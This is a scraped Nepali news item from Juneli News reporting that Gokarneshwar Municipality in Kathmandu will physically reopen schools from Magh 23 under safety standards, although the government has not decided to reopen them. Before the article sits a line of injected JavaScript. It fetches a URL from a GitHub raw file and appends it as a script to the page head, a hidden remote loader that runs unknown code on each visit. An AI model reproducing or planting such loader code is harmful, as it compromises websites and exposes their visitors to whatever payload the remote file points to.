;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं। भौतिक रूपमा बन्द रहेका विद्यालय काठमाण्डु गोकर्णेश्वर नगरपालिकाले खुलाउने भएको छ। माघ २३ गते देखि भौतिक रूपमा विद्यालय खुलाउने नगरलिकाले सूचना निकाली निर्णय गरेको हो।
सुरक्षाको मापदण्ड अपनाई विद्यालय सञ्चालन गर्ने भएको हो। तर सरकारले भने विद्यालय खुलाउने निर्णय गरेको छैन।
फेसबुक प्रतिक्रियाहरु